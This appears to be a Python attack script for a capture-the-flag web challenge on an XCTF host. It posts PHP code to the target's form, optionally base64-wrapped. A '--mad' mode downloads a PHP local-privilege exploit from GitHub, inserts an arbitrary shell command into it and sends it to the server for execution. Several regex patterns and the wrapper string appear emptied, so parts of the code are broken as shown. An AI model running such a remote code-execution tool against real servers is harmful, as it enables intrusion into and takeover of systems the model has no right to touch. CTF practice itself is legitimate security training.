import base64
import html
import re
import sys
import urllib.parse
import urllib.request
TARGET = "http://web-26d72b9c20.adworld.xctf.org.cn/"
def post_code(code: str) -> tuple[int, str, str]:
data = urllib.parse.urlencode({"code": code}).encode()
req = urllib.request.Request(
TARGET,
data=data,
headers={"Content-Type": "application/x-www-form-urlencoded"},
method="POST",
)
try:
with urllib.request.urlopen(req, timeout=45) as resp:
body = resp.read().decode("utf-8", "replace")
status = resp.status
except urllib.error.HTTPError as e:
body = e.read().decode("utf-8", "replace")
status = e.code
m = re.search(r'(?s:(.*?))
', body)
out = html.unescape(m.group(1)) if m else body[:8000]
return status, body, out
def wrap_inner(inner: str) -> str:
b64 = base64.b64encode(inner.encode()).decode()
return f""
def load_madbugs(cmd: str) -> str:
url = "https://raw.githubusercontent.com/califio/publications/main/MADBugs/php/local_exploit.php"
with urllib.request.urlopen(url, timeout=30) as resp:
src = resp.read().decode()
src = re.sub(r"(?s)^#!/usr/bin/env php\s*<\?php\s*", "", src)
src = src.replace('$cmd = "id && uname -a";', f'$cmd = "{cmd}";')
return 'echo "WRAPSTART\\n";\n' + src
def main() -> None:
if len(sys.argv) >= 2 and sys.argv[1] == "--raw":
inner = sys.stdin.read()
payload = inner
print(f"inner_len={len(inner)} payload_len={len(payload)}")
status, body, out = post_code(payload)
print(f"status={status} body_len={len(body)}")
mt = re.search(r'', body)
if mt:
text = html.unescape(mt.group(1))
print(f"textarea_len={len(text)}")
print(f"textarea_head={text[:80]!r}")
else:
print("textarea_len=-1")
print("----- OUT -----")
print(out[:12000])
return
if len(sys.argv) >= 2 and sys.argv[1] == "--mad":
cmd = sys.argv[2] if len(sys.argv) >= 3 else "id"
inner = load_madbugs(cmd)
else:
inner = sys.stdin.read()
payload = wrap_inner(inner)
print(f"inner_len={len(inner)} payload_len={len(payload)}")
status, body, out = post_code(payload)
print(f"status={status} body_len={len(body)}")
mt = re.search(r'', body)
if mt:
text = html.unescape(mt.group(1))
print(f"textarea_len={len(text)}")
print(f"textarea_head={text[:80]!r}")
else:
print("textarea_len=-1")
print("----- OUT -----")
print(out[:12000])
if __name__ == "__main__":
main()